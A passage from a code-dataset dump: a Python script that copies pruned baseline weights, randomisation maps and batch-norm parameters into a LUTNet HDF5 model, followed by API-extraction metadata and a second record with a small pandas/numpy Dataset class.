neg_one_fill\nc26 = one_fill\nc27 = neg_one_fill\nc28 = one_fill\nc29 = neg_one_fill\nc30 = one_fill\nc31 = neg_one_fill\nc32 = one_fill\n\npret_w1 [...] = w1\npret_c1 [...] = c1\npret_c2 [...] = c2\npret_c3 [...] = c3\npret_c4 [...] = c4\npret_c5 [...] = c5\npret_c6 [...] = c6\npret_c7 [...] = c7\npret_c8 [...] = c8\npret_c9 [...] = c9\npret_c10[...] = c10\npret_c11[...] = c11\npret_c12[...] = c12\npret_c13[...] = c13\npret_c14[...] = c14\npret_c15[...] = c15\npret_c16[...] = c16\npret_c17[...] = c17\npret_c18[...] = c18\npret_c19[...] = c19\npret_c20[...] = c20\npret_c21[...] = c21\npret_c22[...] = c22\npret_c23[...] = c23\npret_c24[...] = c24\npret_c25[...] = c25\npret_c26[...] = c26\npret_c27[...] = c27\npret_c28[...] = c28\npret_c29[...] = c29\npret_c30[...] = c30\npret_c31[...] = c31\npret_c32[...] = c32\n\npret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)\npret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)\npret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)\np_gamma[...] = np.array(bl_gamma)\npret_means[...] = np.array(bl_means)\npret_pruning_mask[...] = np.array(bl_pruning_mask)\n\nrand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)\npret_rand_map_exp_0[...] = rand_map_0_expand\nrand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)\npret_rand_map_exp_1[...] = rand_map_1_expand\nrand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)\npret_rand_map_exp_2[...] = rand_map_2_expand\n\nprint(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))\n\n# dense layer 5\n\nbl_w1 = bl[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_1:0\"]\nbl_rand_map_0 = bl[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_0:0\"]\nbl_pruning_mask = bl[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"pruning_mask:0\"]\nbl_gamma = bl[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable:0\"]\nbl_means = bl[\"model_weights\"][\"residual_sign_4\"][\"residual_sign_4\"][\"means:0\"]\npret_rand_map_0 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_0:0\"]\npret_rand_map_1 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_1:0\"]\npret_rand_map_2 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_2:0\"]\npret_pruning_mask = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"pruning_mask:0\"]\np_gamma = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable:0\"]\npret_means = pretrained[\"model_weights\"][\"residual_sign_4\"][\"residual_sign_4\"][\"means:0\"]\n\npret_c1 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_1:0\"]\npret_c2 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_2:0\"]\npret_c3 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_3:0\"]\npret_c4 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_4:0\"]\npret_c5 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_5:0\"]\npret_c6 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_6:0\"]\npret_c7 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_7:0\"]\npret_c8 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_8:0\"]\npret_c9 = 
pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_9:0\"]\npret_c10= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_10:0\"]\npret_c11= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_11:0\"]\npret_c12= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_12:0\"]\npret_c13= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_13:0\"]\npret_c14= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_14:0\"]\npret_c15= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_15:0\"]\npret_c16= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_16:0\"]\npret_c17= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_17:0\"]\npret_c18= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_18:0\"]\npret_c19= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_19:0\"]\npret_c20= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_20:0\"]\npret_c21= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_21:0\"]\npret_c22= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_22:0\"]\npret_c23= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_23:0\"]\npret_c24= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_24:0\"]\npret_c25= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_25:0\"]\npret_c26= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_26:0\"]\npret_c27= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_27:0\"]\npret_c28= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_28:0\"]\npret_c29= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_29:0\"]\npret_c30= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_30:0\"]\npret_c31= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_31:0\"]\npret_c32= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_32:0\"]\npret_w1 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_33:0\"]\n\npret_rand_map_exp_0 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_exp_0:0\"]\npret_rand_map_exp_1 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_exp_1:0\"]\npret_rand_map_exp_2 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_exp_2:0\"]\n\nweight_shape = np.shape(bl_w1)\ntile_shape = np.shape(pret_c1)\nzero_fill = np.zeros(tile_shape)\none_fill = np.ones(tile_shape)\nneg_one_fill = -np.ones(tile_shape)\n\n# randomisation and pruning recovery\nbl_w1_unroll = np.array(bl_w1)\nbl_w1 = np.array(bl_w1)\n\nrand_map_0 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_0)\nrand_map_1 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_1)\nrand_map_2 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_2)\n\npruning_mask = np.array(bl_pruning_mask).astype(bool)\ninit_mask = np.logical_not(pruning_mask[rand_map_0])\npruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]\npruning_mask = 
np.logical_or(pruning_mask, pruning_mask_recover)\ninit_mask = np.reshape(init_mask, tile_shape)\n\n# expand randomisation map across tiles\n\nrand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])\nrand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])\nrand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])\nfor i in range(weight_shape[0]):\n rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n\nbl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]\nbl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)\n\nw1 = bl_w1\n\n# connect1 only\nc1 = one_fill\nc2 = neg_one_fill\nc3 = one_fill\nc4 = neg_one_fill\nc5 = one_fill\nc6 = neg_one_fill\nc7 = one_fill\nc8 = neg_one_fill\nc9 = one_fill\nc10 = neg_one_fill\nc11 = one_fill\nc12 = neg_one_fill\nc13 = one_fill\nc14 = neg_one_fill\nc15 = one_fill\nc16 = neg_one_fill\nc17 = neg_one_fill\nc18 = one_fill\nc19 = neg_one_fill\nc20 = one_fill\nc21 = neg_one_fill\nc22 = one_fill\nc23 = neg_one_fill\nc24 = one_fill\nc25 = neg_one_fill\nc26 = one_fill\nc27 = neg_one_fill\nc28 = one_fill\nc29 = neg_one_fill\nc30 = one_fill\nc31 = neg_one_fill\nc32 = one_fill\n\npret_w1 [...] = w1\npret_c1 [...] = c1\npret_c2 [...] = c2\npret_c3 [...] = c3\npret_c4 [...] = c4\npret_c5 [...] = c5\npret_c6 [...] = c6\npret_c7 [...] = c7\npret_c8 [...] = c8\npret_c9 [...] = c9\npret_c10[...] = c10\npret_c11[...] = c11\npret_c12[...] = c12\npret_c13[...] = c13\npret_c14[...] = c14\npret_c15[...] = c15\npret_c16[...] = c16\npret_c17[...] = c17\npret_c18[...] = c18\npret_c19[...] = c19\npret_c20[...] = c20\npret_c21[...] = c21\npret_c22[...] = c22\npret_c23[...] = c23\npret_c24[...] = c24\npret_c25[...] = c25\npret_c26[...] = c26\npret_c27[...] = c27\npret_c28[...] = c28\npret_c29[...] = c29\npret_c30[...] = c30\npret_c31[...] = c31\npret_c32[...] = c32\n\npret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)\npret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)\npret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)\np_gamma[...] = np.array(bl_gamma)\npret_means[...] = np.array(bl_means)\npret_pruning_mask[...] = np.array(bl_pruning_mask)\n\nrand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)\npret_rand_map_exp_0[...] = rand_map_0_expand\nrand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)\npret_rand_map_exp_1[...] = rand_map_1_expand\nrand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)\npret_rand_map_exp_2[...] 
= rand_map_2_expand\n\nprint(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))\n\n\n# bn 1\n\nbl_beta = bl[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"beta:0\"]\nbl_gamma = bl[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"gamma:0\"]\nbl_moving_mean = bl[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"moving_mean:0\"]\nbl_moving_variance = bl[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"moving_variance:0\"]\np_beta = pretrained[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"beta:0\"]\np_gamma = pretrained[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"gamma:0\"]\np_moving_mean = pretrained[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"moving_mean:0\"]\np_moving_variance = pretrained[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"moving_variance:0\"]\n\np_beta[...] = np.array(bl_beta)\np_gamma[...] = np.array(bl_gamma)\np_moving_mean[...] = np.array(bl_moving_mean)\np_moving_variance[...] = np.array(bl_moving_variance)\n\n# bn 2\n\nbl_beta = bl[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"beta:0\"]\nbl_gamma = bl[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"gamma:0\"]\nbl_moving_mean = bl[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"moving_mean:0\"]\nbl_moving_variance = bl[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"moving_variance:0\"]\np_beta = pretrained[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"beta:0\"]\np_gamma = pretrained[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"gamma:0\"]\np_moving_mean = pretrained[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"moving_mean:0\"]\np_moving_variance = pretrained[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"moving_variance:0\"]\n\np_beta[...] = np.array(bl_beta)\np_gamma[...] = np.array(bl_gamma)\np_moving_mean[...] = np.array(bl_moving_mean)\np_moving_variance[...] = np.array(bl_moving_variance)\n\n# bn 3\n\nbl_beta = bl[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"beta:0\"]\nbl_gamma = bl[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"gamma:0\"]\nbl_moving_mean = bl[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"moving_mean:0\"]\nbl_moving_variance = bl[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"moving_variance:0\"]\np_beta = pretrained[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"beta:0\"]\np_gamma = pretrained[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"gamma:0\"]\np_moving_mean = pretrained[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"moving_mean:0\"]\np_moving_variance = pretrained[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"moving_variance:0\"]\n\np_beta[...] = np.array(bl_beta)\np_gamma[...] = np.array(bl_gamma)\np_moving_mean[...] = np.array(bl_moving_mean)\np_moving_variance[...] 
= np.array(bl_moving_variance)\n\n# bn 4\n\nbl_beta = bl[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"beta:0\"]\nbl_gamma = bl[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"gamma:0\"]\nbl_moving_mean = bl[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"moving_mean:0\"]\nbl_moving_variance = bl[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"moving_variance:0\"]\np_beta = pretrained[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"beta:0\"]\np_gamma = pretrained[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"gamma:0\"]\np_moving_mean = pretrained[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"moving_mean:0\"]\np_moving_variance = pretrained[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"moving_variance:0\"]\n\np_beta[...] = np.array(bl_beta)\np_gamma[...] = np.array(bl_gamma)\np_moving_mean[...] = np.array(bl_moving_mean)\np_moving_variance[...] = np.array(bl_moving_variance)\n\n# bn 5\n\nbl_beta = bl[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"beta:0\"]\nbl_gamma = bl[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"gamma:0\"]\nbl_moving_mean = bl[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"moving_mean:0\"]\nbl_moving_variance = bl[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"moving_variance:0\"]\np_beta = pretrained[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"beta:0\"]\np_gamma = pretrained[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"gamma:0\"]\np_moving_mean = pretrained[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"moving_mean:0\"]\np_moving_variance = pretrained[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"moving_variance:0\"]\n\np_beta[...] = np.array(bl_beta)\np_gamma[...] = np.array(bl_gamma)\np_moving_mean[...] = np.array(bl_moving_mean)\np_moving_variance[...] 
= np.array(bl_moving_variance)\n\npretrained.close()\n"},"apis":{"kind":"list like","value":["numpy.tile","numpy.random.shuffle","numpy.reshape","numpy.ones","numpy.logical_and","numpy.logical_not","numpy.logical_or","h5py.File","numpy.argsort","numpy.array","shutil.copyfile","numpy.zeros","numpy.shape","numpy.arange","numpy.set_printoptions"],"string":"[\n \"numpy.tile\",\n \"numpy.random.shuffle\",\n \"numpy.reshape\",\n \"numpy.ones\",\n \"numpy.logical_and\",\n \"numpy.logical_not\",\n \"numpy.logical_or\",\n \"h5py.File\",\n \"numpy.argsort\",\n \"numpy.array\",\n \"shutil.copyfile\",\n \"numpy.zeros\",\n \"numpy.shape\",\n \"numpy.arange\",\n \"numpy.set_printoptions\"\n]"},"extract_api":{"kind":"string","value":"[((31, 68), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'threshold': 'np.nan'}), '(threshold=np.nan)\\n', (50, 68), True, 'import numpy as np\\n'), ((99, 147), 'shutil.copyfile', 'copyfile', (['\"\"\"dummy_lutnet.h5\"\"\"', '\"\"\"pretrained_bin.h5\"\"\"'], {}), \"('dummy_lutnet.h5', 'pretrained_bin.h5')\\n\", (107, 147), False, 'from shutil import copyfile\\n'), ((211, 247), 'h5py.File', 'h5py.File', (['\"\"\"baseline_pruned.h5\"\"\"', '\"\"\"r\"\"\"'], {}), \"('baseline_pruned.h5', 'r')\\n\", (220, 247), False, 'import h5py\\n'), ((297, 333), 'h5py.File', 'h5py.File', (['\"\"\"pretrained_bin.h5\"\"\"', '\"\"\"r+\"\"\"'], {}), \"('pretrained_bin.h5', 'r+')\\n\", (306, 333), False, 'import h5py\\n'), ((949, 964), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (957, 964), True, 'import numpy as np\\n'), ((980, 998), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\\n', (988, 998), True, 'import numpy as np\\n'), ((1024, 1049), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (1032, 1049), True, 'import numpy as np\\n'), ((5514, 5529), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\\n', (5522, 5529), True, 'import numpy as np\\n'), ((5543, 5560), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\\n', (5551, 5560), True, 'import numpy as np\\n'), ((5573, 5593), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\\n', (5581, 5593), True, 'import numpy as np\\n'), ((5605, 5624), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\\n', (5612, 5624), True, 'import numpy as np\\n'), ((5714, 5729), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (5722, 5729), True, 'import numpy as np\\n'), ((5738, 5753), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (5746, 5753), True, 'import numpy as np\\n'), ((5768, 5792), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (5777, 5792), True, 'import numpy as np\\n'), ((5793, 5822), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\\n', (5810, 5822), True, 'import numpy as np\\n'), ((5836, 5860), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (5845, 5860), True, 'import numpy as np\\n'), ((5861, 5890), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\\n', (5878, 5890), True, 'import numpy as np\\n'), ((5904, 5928), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (5913, 5928), True, 'import numpy as np\\n'), ((5929, 5958), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\\n', (5946, 5958), True, 'import numpy as np\\n'), ((6026, 6066), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\\n', (6040, 6066), 
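The script captured in the record above updates a pretrained LUTNet HDF5 checkpoint in place by assigning into h5py datasets (`pret_cN[...] = cN`, one statement per LUT constant). Below is a minimal sketch of the same in-place update pattern with the 32 constants handled in a loop. The file names and the `binary_dense_5` group path follow the ones visible in the record, but the regular ±1 fill and the assumption that all these datasets share one tile shape are simplifications for illustration, not a faithful reproduction of the original script.

import h5py
import numpy as np

# File names as they appear in the record; group path for the dense-5 layer.
src_path, dst_path = "baseline_pruned.h5", "pretrained_bin.h5"
layer = "model_weights/binary_dense_5/binary_dense_5"

with h5py.File(src_path, "r") as src, h5py.File(dst_path, "r+") as dst:
    # Copy the binary weight tensor verbatim (in-place dataset assignment).
    dst[layer + "/Variable_33:0"][...] = np.array(src[layer + "/Variable_1:0"])

    # Fill the 32 per-LUT constants with alternating +/-1 tiles. The original
    # script hard-codes a slightly irregular sign pattern; a plain alternation
    # is used here purely for illustration.
    tile_shape = dst[layer + "/Variable_1:0"].shape
    for i in range(1, 33):
        sign = 1.0 if i % 2 == 1 else -1.0
        dst[layer + "/Variable_%d:0" % i][...] = sign * np.ones(tile_shape)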
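One detail worth flagging in the randomisation-recovery blocks of that script: the tile counts and index arithmetic are written with `/` on integers (`weight_shape[0]/tile_shape[0]`), which relies on Python 2 floor division; under Python 3 these expressions become floats and `np.tile` and the index update no longer behave as intended. The sketch below reformulates the intent — reuse one per-tile shuffle across every tile — with explicit integer division. Sizes and names are illustrative, and this is a simplification rather than a line-by-line translation of the original loop.

import numpy as np

tile_len, n_tiles = 4, 3                      # hypothetical tile size / tile count
rand_map = np.random.permutation(tile_len)   # one shuffle, defined per tile

expanded = np.tile(rand_map, n_tiles)           # repeat the shuffle for every tile
for i in range(tile_len * n_tiles):
    tile_idx = i // tile_len                  # integer division, not "/"
    expanded[i] += tile_idx * tile_len        # offset the shuffle into this tile's block

# Every tile is permuted the same way, but only within its own range of rows.
print(expanded.reshape(n_tiles, tile_len))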
'(bl_pruning_mask)\\n', (33432, 33449), True, 'import numpy as np\\n'), ((1109, 1134), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (1117, 1134), True, 'import numpy as np\\n'), ((9199, 9224), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (9207, 9224), True, 'import numpy as np\\n'), ((17289, 17314), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (17297, 17314), True, 'import numpy as np\\n'), ((25379, 25404), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (25387, 25404), True, 'import numpy as np\\n'), ((33469, 33494), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (33477, 33494), True, 'import numpy as np\\n')]"}}},{"rowIdx":740,"cells":{"code":{"kind":"string","value":"import pandas as pd\nimport numpy as np\nfrom src.si.util.util import label_gen\n\n__all__ = ['Dataset']\n\nclass Dataset:\n def __init__(self, X=None, Y=None,\n xnames: list = None,\n yname: str = None):\n \"\"\" Tabular Dataset\"\"\"\n if X is None:\n raise Exception(\"Trying to instanciate a DataSet without any data\")\n self.X = X\n self.Y = Y\n self.xnames = xnames if xnames else label_gen(X.shape[1])\n self.yname = yname if yname else 'Y'\n\n @classmethod\n def from_data(cls, filename, sep=\",\", labeled=True):\n \"\"\"Creates a DataSet from a data file.\n\n :param filename: The filename\n :type filename: str\n :param sep: attributes separator, defaults to \",\"\n :type sep: str, optional\n :return: A DataSet object\n :rtype: DataSet\n \"\"\"\n data = np.genfromtxt(filename, delimiter=sep)\n if labeled:\n X = data[:, 0:-1]\n Y = data[:, -1]\n else:\n X = data\n Y = None\n return cls(X, Y)\n\n @classmethod\n def from_dataframe(cls, df, ylabel=None):\n \"\"\"Creates a DataSet from a pandas dataframe.\n :param df: [description]\n :type df: [type]\n :param ylabel: [description], defaults to None\n :type ylabel: [type], optional\n :return: [description]\n :rtype: [type]\n \"\"\"\n\n if ylabel and ylabel in df.columns:\n X = df.loc[:, df.columns != ylabel].to_numpy() #transforma num array de numpy\n Y = df.loc[:, ylabel].to_numpy()\n # xnames = df.columns.tolist().remove(ylabel)\n yname = ylabel\n xnames = df.columns.tolist()\n for name in xnames:\n if name == yname:\n xnames.remove(yname)\n\n else:\n X = df.to_numpy()\n Y = None\n xnames = df.columns.tolist()\n yname = None\n\n return cls(X, Y, xnames, yname)\n\n\n def __len__(self):\n \"\"\"Returns the number of data points.\"\"\"\n return self.X.shape[0]\n\n def hasLabel(self):\n \"\"\"Returns True if the dataset constains labels (a dependent variable)\"\"\"\n return self.Y is not None\n\n def getNumFeatures(self):\n \"\"\"Returns the number of features\"\"\"\n return self.X.shape[1]\n\n def getNumClasses(self):\n \"\"\"Returns the number of label classes or 0 if the dataset has no dependent variable.\"\"\"\n return len(np.unique(self.Y)) if self.hasLabel() else 0\n\n def writeDataset(self, filename, sep=\",\"):\n \"\"\"Saves the dataset to a file\n\n :param filename: The output file path\n :type filename: str\n :param sep: The fields separator, defaults to \",\"\n :type sep: str, optional\n \"\"\"\n\n fullds = np.hstack((self.X, self.Y.reshape(len(self.Y), 1)))\n np.savetxt(filename, fullds, delimiter=sep)\n\n def toDataframe(self):\n \"\"\" Converts the dataset into a pandas DataFrame\"\"\"\n if self.hasLabel():\n df = pd.DataFrame(np.hstack((self.X, self.Y.reshape(len(self.Y), 1))), 
columns=self.xnames[:]+[self.yname]) #columns=np.hstack((self.xnames, self.yname)))\n else:\n df = pd.DataFrame(self.X.copy(), columns=self.xnames[:])\n return df\n\n def getXy(self):\n return self.X, self.Y\n\n\ndef summary(dataset, format='df'):\n \"\"\" Returns the statistics of a dataset(mean, std, max, min)\n\n :param dataset: A Dataset object\n :type dataset: si.data.Dataset\n :param format: Output format ('df':DataFrame, 'dict':dictionary ), defaults to 'df'\n :type format: str, optional\n \"\"\"\n if format not in [\"df\", \"dict\"]:\n raise Exception(\"Invalid format. Choose between 'df' and 'dict'.\")\n if dataset.hasLabel():\n data = np.hstack((dataset.X, dataset.Y.reshape(len(dataset.Y), 1)))\n #data = np.hstack([dataset.X, np.reshape(dataset.Y, (-1, 1))])\n columns = dataset.xnames[:] + [dataset.yname]\n else:\n data = dataset.X\n columns = dataset.xnames[:]\n stats = {}\n if type(dataset.Y[0]) is str:\n for i in range(data.shape[1]-1): #ve colunas\n _means = np.mean(data[:, i], axis=0)\n _vars = np.var(data[:, i], axis=0)\n _maxs = np.max(data[:, i], axis=0)\n _mins = np.min(data[:, i], axis=0)\n\n stat = {\"mean\": _means,\n \"var\": _vars,\n \"max\": _maxs,\n \"min\": _mins\n }\n stats[columns[i]] = stat\n else:\n for i in range(data.shape[1]): # ve colunas\n _means = np.mean(data[:, i], axis=0)\n _vars = np.var(data[:, i], axis=0)\n _maxs = np.max(data[:, i], axis=0)\n _mins = np.min(data[:, i], axis=0)\n\n stat = {\"mean\": _means,\n \"var\": _vars,\n \"max\": _maxs,\n \"min\": _mins\n }\n stats[columns[i]] = stat\n # _means = np.mean(data, axis=0)\n # _vars = np.var(data, axis=0)\n # _maxs = np.max(data, axis=0)\n # _mins = np.min(data, axis=0)\n # stats = {}\n # for i in range(data.shape[1]):\n # stat = {\"mean\": _means[i],\n # \"var\": _vars[i],\n # \"max\": _maxs[i],\n # \"min\": _mins[i]\n # }\n # stats[columns[i]] = stat\n\n if format == \"dict\":\n return stats\n else:\n return pd.DataFrame(stats)\n"},"apis":{"kind":"list like","value":["src.si.util.util.label_gen","numpy.mean","numpy.unique","numpy.max","numpy.savetxt","numpy.min","pandas.DataFrame","numpy.genfromtxt","numpy.var"],"string":"[\n \"src.si.util.util.label_gen\",\n \"numpy.mean\",\n \"numpy.unique\",\n \"numpy.max\",\n \"numpy.savetxt\",\n \"numpy.min\",\n \"pandas.DataFrame\",\n \"numpy.genfromtxt\",\n \"numpy.var\"\n]"},"extract_api":{"kind":"string","value":"[((878, 916), 'numpy.genfromtxt', 'np.genfromtxt', (['filename'], {'delimiter': 'sep'}), '(filename, delimiter=sep)\\n', (891, 916), True, 'import numpy as np\\n'), ((2885, 2928), 'numpy.savetxt', 'np.savetxt', (['filename', 'fullds'], {'delimiter': 'sep'}), '(filename, fullds, 